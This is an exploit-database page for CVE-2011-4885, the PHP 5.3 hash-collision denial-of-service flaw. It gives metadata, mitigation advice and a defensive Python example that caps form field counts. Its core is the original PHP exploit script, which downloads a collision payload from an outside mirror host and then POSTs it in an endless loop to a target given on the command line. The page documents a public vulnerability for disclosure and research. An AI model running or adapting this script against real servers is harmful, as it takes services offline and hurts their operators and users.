CVE-2011-4885 PHP Hashtables Denial of Service - exploit.company
Vendor: PHP
By: infodox
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 693
Product Name: PHP
Affected Version From: 5.3.*
Affected Version To: 5.3.*
Patch Exists: NO
Related CWE: CVE-2011-4885
CPE: a:php:php:5.3
Platforms Tested: Linux
Year: 2011

CVE-2011-4885 PHP Hashtables Denial of Service

This exploit targets a vulnerability in PHP 5.3.* that allows an attacker to cause a denial of service. It uses hash collisions to overload the system and cause it to crash.

Mitigation:

Upgrade to a patched version of PHP or implement proper input validation to prevent hash collisions.
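
One way to apply the input-validation mitigation above (an added example, not from the original page or from PHP itself): PHP fills $_POST before any script code runs, so the check sits in front of the interpreter and caps the field count and body size of a form POST as it streams in. The function name, the Verdict type, the sample inputs and both limits are assumptions of this example.

```python
from typing import Iterable, NamedTuple

MAX_VARS = 1000            # assumption: matches the default of PHP's max_input_vars
MAX_BODY_BYTES = 1 << 20   # assumption: 1 MiB cap picked for this example


class Verdict(NamedTuple):
    allowed: bool
    reason: str
    fields_seen: int
    bytes_seen: int


def inspect_form_body(chunks: Iterable[bytes],
                      max_vars: int = MAX_VARS,
                      max_bytes: int = MAX_BODY_BYTES) -> Verdict:
    """Count fields in a streamed urlencoded body; stop at the first limit hit.

    Only '&' separators are examined. No key is decoded or stored, so the
    guard does constant work per byte whatever the keys would hash to.
    """
    fields = seen = 0
    in_field = False                      # True while inside a non-empty field
    for chunk in chunks:
        seen += len(chunk)
        if seen > max_bytes:
            return Verdict(False, "body too large", fields, seen)
        for byte in chunk:
            if byte == 0x26:              # '&' closes the current field
                in_field = False
            elif not in_field:            # first byte of a new field
                in_field = True
                fields += 1
                if fields > max_vars:
                    return Verdict(False, "too many fields", fields, seen)
    return Verdict(True, "ok", fields, seen)


def sample_many_fields(n: int):
    """Constructed sample: n short, unrelated fields sent one per chunk."""
    return (b"k%d=&" % i for i in range(n))


# Constructed sample: an ordinary form split across two network reads.
NORMAL = [b"user=alice&pa", b"ss=s3cret&&remember=1"]

if __name__ == "__main__":
    print(inspect_form_body(NORMAL))
    print(inspect_form_body(sample_many_fields(5000)))
```

The guard returns as soon as a limit is crossed, so the remainder of an oversized body is never read, and the rejected request never reaches the code that builds the hash table.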

Exploit-DB raw data:

  

# Exploit Title: CVE-2011-4885 PHP Hashtables Denial of Service Exploit
# Date: 1/1/12
# Author: infodox
# Software Link: php.net
# Version: 5.3.*
# Tested on: Linux
# CVE : CVE-2011-4885

# Exploit Download -- http://infodox.co.cc/Downloads/phpdos.txt

<?php
/*
PHP 5.3.* Hash Collision DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885

Mirrors List:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18296.txt (hashcollide.txt)
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt

Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing

Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesn't work, replace with one of the mirrors listed above
while(1) {
 echo "firing";
 $ch = curl_init("$targ");
 curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
 curl_exec($ch);
 curl_close($ch);
 echo "[+] Voly Sent!";
}
?>